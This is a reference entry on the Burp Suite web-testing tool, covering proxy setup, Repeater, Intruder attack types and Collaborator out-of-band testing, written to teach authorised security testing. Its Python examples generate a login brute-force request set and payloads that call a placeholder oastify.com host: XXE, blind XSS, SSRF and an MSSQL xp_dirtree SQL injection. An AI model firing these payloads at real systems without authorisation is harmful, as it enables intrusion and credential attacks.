Burp Suite

Type: Tool
Also known as: Burp, Burp Suite Professional, Burp Suite Community
Related: Web Application Testing, SQL Injection, XSS

Description

Burp Suite is the most widely used platform for web application security testing. At its core it is an intercepting HTTP/HTTPS proxy; around that sit tools for manual testing (Repeater, Intruder), automated scanning (Scanner, Professional edition only), and extensibility through the BApp Store and the Montoya extension API. Developed by PortSwigger.

Usage / Details

Core Tools

Tool          Purpose
Proxy         Intercept, inspect and modify browser traffic
Repeater      Manually replay and tweak individual requests
Intruder      Fuzzing and brute-force attacks against marked positions
Scanner       Automated vulnerability scanning (Pro)
Decoder       Encode/decode (Base64, URL, hex, etc.)
Comparer      Diff two requests or responses
Logger        Full log of all traffic generated by every Burp tool
DOM Invader   DOM XSS and prototype pollution testing, built into Burp's embedded browser
Collaborator  Out-of-band interaction server for SSRF, blind SQLi, blind XSS, XXE (Pro)

Setup

  1. Point the browser at Burp's proxy listener, 127.0.0.1:8080 by default (Proxy > Proxy settings to change it).
  2. Install Burp's CA certificate in the browser so HTTPS can be intercepted: with the proxy configured, navigate to http://burp and click "CA Certificate" (http://burp/cert returns the same certificate in DER form, which is handy for command-line tools).
  3. Alternatively, skip steps 1 and 2 and use Burp's embedded Chromium browser (Proxy > Intercept > "Open browser"), which is pre-configured and already trusts the Burp CA.
  4. Check: with Intercept on, load any page; the request should appear in Proxy > Intercept and the site should only load after you forward it.

Caveat: the Burp CA's private key lives in your Burp user configuration, and any browser that trusts it will silently accept certificates signed with it. Use a dedicated testing browser or profile rather than installing the CA into your everyday browser, and remove it when the engagement ends.

Common Workflows

Manual Testing with Repeater

  • Intercept a request (or pick one from Proxy > HTTP history) → Send to Repeater (Ctrl+R) → modify and resend, comparing each response against the baseline.
  • SQLi: append a single quote (') to a parameter and look for a database error, a changed status code or a different response length; then send two quotes ('') and check whether the original behaviour returns, which is stronger evidence than the error alone.
  • XSS: inject a marker such as <script>alert(1)</script> and search the response for it. A reflection that is unencoded in an HTML body is the hit; a reflection inside an attribute value or a JavaScript string needs a payload that first breaks out of that context.

Fuzzing with Intruder

1. Send the request to Intruder (Ctrl+I).
2. Mark each injection point by wrapping its value in section signs: §value§ (Burp does this for all parameters with "Auto §"; "Clear §" removes them).
3. Choose the attack type:
   - Sniper: one payload set; each position is fuzzed in turn while the others keep their original value (positions × payloads requests).
   - Battering Ram: one payload set; the same payload is inserted into every position at once (one request per payload).
   - Pitchfork: one payload set per position, stepped in parallel (the i-th item of each set goes together; stops at the shortest set).
   - Cluster Bomb: one payload set per position, every combination (cartesian product), e.g. usernames × passwords.
4. Load a payload list (SecLists, a custom file, or a built-in generator such as numbers or a simple list).
5. Spot successes with Grep - Match (flag responses containing a string), Grep - Extract (pull a value into its own column) and by sorting the results table on status code or response length.

Note: Community edition throttles Intruder heavily. For large wordlists use the free Turbo Intruder extension, or ffuf / feroxbuster outside Burp, and proxy their traffic through Burp only when you need to inspect it.
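To make the four attack types concrete, here is an added example (not PortSwigger code, and not how Intruder is implemented) that expands a §-marked request the way Intruder does for each attack type, plus a minimal stand-in for a Grep - Match rule. The request template, host and payload lists are constructed for illustration.

```python
"""Added example: how Burp Intruder's attack types expand a marked request.

Not PortSwigger code. Reproduces the request-generation rules so the
request counts and the Pitchfork/Cluster Bomb distinction are concrete.
"""
from itertools import product

MARK = "\u00a7"  # the section sign Burp uses around payload positions

# Constructed sample: a login request with two payload positions and the
# base values Intruder keeps for positions it is not currently fuzzing.
TEMPLATE = (
    "POST /login HTTP/1.1\r\n"
    "Host: target.example\r\n"  # hypothetical host
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    f"username={MARK}admin{MARK}&password={MARK}changeme{MARK}"
)


def parse_template(template):
    """Split a §-marked request into static chunks and base values.

    Returns (chunks, base_values); chunks has one more entry than values.
    """
    parts = template.split(MARK)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced payload markers")
    return parts[0::2], parts[1::2]


def render(chunks, values):
    """Interleave the static chunks with one value per position."""
    out = [chunks[0]]
    for value, chunk in zip(values, chunks[1:]):
        out.append(value)
        out.append(chunk)
    return "".join(out)


def sniper(template, payloads):
    """One payload set; each position in turn, others keep their base value."""
    chunks, base = parse_template(template)
    requests = []
    for pos in range(len(base)):
        for payload in payloads:
            values = list(base)
            values[pos] = payload
            requests.append(render(chunks, values))
    return requests


def battering_ram(template, payloads):
    """One payload set; the same payload in every position at once."""
    chunks, base = parse_template(template)
    return [render(chunks, [p] * len(base)) for p in payloads]


def pitchfork(template, payload_sets):
    """One set per position, stepped in parallel; stops at the shortest set."""
    chunks, base = parse_template(template)
    _check_sets(base, payload_sets)
    return [render(chunks, list(combo)) for combo in zip(*payload_sets)]


def cluster_bomb(template, payload_sets):
    """One set per position; every combination (cartesian product)."""
    chunks, base = parse_template(template)
    _check_sets(base, payload_sets)
    return [render(chunks, list(combo)) for combo in product(*payload_sets)]


def _check_sets(base, payload_sets):
    if len(payload_sets) != len(base):
        raise ValueError(f"need {len(base)} payload sets, got {len(payload_sets)}")


def grep_match(body, patterns):
    """Stand-in for Grep - Match: which of the strings occur in a response body."""
    return [p for p in patterns if p in body]


if __name__ == "__main__":
    users = ["admin", "root"]
    passwords = ["password", "letmein", "changeme"]
    attacks = [
        ("sniper", sniper(TEMPLATE, passwords)),
        ("battering ram", battering_ram(TEMPLATE, passwords)),
        ("pitchfork", pitchfork(TEMPLATE, [users, passwords])),
        ("cluster bomb", cluster_bomb(TEMPLATE, [users, passwords])),
    ]
    for name, requests in attacks:
        body = requests[0].rsplit("\r\n\r\n", 1)[1]
        print(f"{name:13s} {len(requests)} requests, first body: {body}")
```

Sniper produces 2 × 3 = 6 requests here, Battering Ram 3, Pitchfork 2 (limited by the shorter user list) and Cluster Bomb 2 × 3 = 6; with realistic wordlists the Cluster Bomb count explodes, which is why it is the one to throttle.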

Burp Collaborator (OAST)

  • Professional only. Burp issues a unique *.oastify.com domain (the public Collaborator server; a private server can be self-hosted) and records every DNS, HTTP(S) and SMTP interaction with it.
  • Use a Collaborator host in payloads for SSRF, XXE, blind SQLi and blind XSS and confirm the bug by the out-of-band interaction rather than by anything in the response.
  • Check the Collaborator tab ("Poll now") for incoming DNS/HTTP callbacks; keep polling during and after the test, because some interactions (scheduled jobs, stored XSS viewed by an admin) arrive much later than the request that planted them.
  • A DNS-only interaction still proves the target resolved your name, even where egress HTTP is blocked; use a different subdomain per injection point so a callback can be traced back to the parameter that caused it.
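As an added example (not PortSwigger code), the following generates OAST payloads that each carry their own subdomain under a Collaborator base domain and maps an incoming callback hostname back to the parameter and bug class that triggered it. The base domain shown is a constructed placeholder, the parameter names are hypothetical, and the blind SQLi payload is the MSSQL xp_dirtree variant only.

```python
"""Added example: per-injection-point Collaborator subdomains and callback
correlation. Not PortSwigger code; the base domain is a placeholder for the
one Burp's Collaborator tab issues."""
import re

COLLAB = "abc123def456.oastify.com"  # constructed placeholder
KINDS = ("ssrf", "xxe", "xss", "sqli")


def tag_label(param, kind):
    """One DNS label per (parameter, bug class).

    Labels are case-insensitive and at most 63 characters, so normalise to
    lower case, drop anything that is not a letter or digit, and truncate.
    """
    return re.sub(r"[^a-z0-9]", "", f"{param}-{kind}".lower())[:63]


def _payload(kind, host):
    if kind == "ssrf":
        return f"http://{host}/"
    if kind == "xxe":
        return ('<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM '
                f'"http://{host}/">]><x>&xxe;</x>')
    if kind == "xss":
        return f'"><script src="https://{host}/"></script>'
    # Blind SQLi on MSSQL: xp_dirtree makes the server resolve the UNC host.
    return f"';EXEC master..xp_dirtree '\\\\{host}\\a'--"


def build_payloads(base, params):
    """Return ({param: {kind: payload}}, {label: (param, kind)}).

    The second dict is the registry used to correlate callbacks later.
    """
    payloads, registry = {}, {}
    for param in params:
        per_param = {}
        for kind in KINDS:
            label = tag_label(param, kind)
            registry[label] = (param, kind)
            per_param[kind] = _payload(kind, f"{label}.{base}")
        payloads[param] = per_param
    return payloads, registry


def correlate(callback_host, base, registry):
    """Map a hostname from the Collaborator tab back to (param, kind).

    Tolerates a trailing dot, mixed-case (0x20-randomised) lookups and extra
    leading labels; returns None for hosts outside our base domain.
    """
    host = callback_host.lower().rstrip(".")
    suffix = "." + base.lower()
    if not host.endswith(suffix):
        return None
    label = host[: -len(suffix)].split(".")[-1]
    return registry.get(label)


if __name__ == "__main__":
    payloads, registry = build_payloads(COLLAB, ["url", "q"])  # hypothetical params
    for param, per_kind in payloads.items():
        for kind, payload in per_kind.items():
            print(f"{param:4s} {kind:5s} {payload}")
    # Constructed callbacks as they might appear in the Collaborator tab.
    for seen in ("URLSSRF.abc123def456.oastify.com.",
                 "x.qsqli.abc123def456.oastify.com",
                 "qsqli.example.com"):
        print(seen, "->", correlate(seen, COLLAB, registry))
```

Keep the registry with the test notes: the Collaborator tab shows the hostname and the interaction type, and the label is the only thing tying a callback back to the request that planted it once hundreds of payloads are in flight.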

Scanning (Pro)

  • Right-click a request → "Scan" → choose Active scan (sends attack payloads) or Passive scan (only inspects traffic already seen).
  • For broad coverage, define a target scope and run Crawl + Audit against it from the Dashboard; keep the scope tight, because an active scan will fire payloads at every in-scope endpoint, including ones that change state.
  • Review findings under Dashboard > Issue activity, and confirm each one manually in Repeater before reporting it.

Useful Extensions (BApp Store)

  • Autorize — replays every request with a lower-privileged (or no) session cookie to find broken access control and IDOR
  • Turbo Intruder — high-speed fuzzer driven by Python scripts; works in Community edition
  • HTTP Request Smuggler — detects and exploits HTTP request smuggling (CL.TE, TE.CL, H2 desync)
  • JWT Editor — decode, edit, sign and attack JWTs (alg=none, key confusion, embedded JWK)
  • Active Scan++ — adds checks the core scanner lacks
  • Param Miner — discovers hidden parameters and headers (useful for cache poisoning)
  • Hackvertor — tag-based encoding and transformation of complex payloads
  • Logger++ — enhanced logging with filtering and export

Keyboard Shortcuts

Action                 Shortcut
Send to Repeater       Ctrl+R
Send to Intruder       Ctrl+I
Forward intercepted    Ctrl+F
Toggle intercept       Ctrl+T

References

  • PortSwigger Web Security Academy — portswigger.net/web-security
  • Burp Suite documentation — portswigger.net/burp/documentation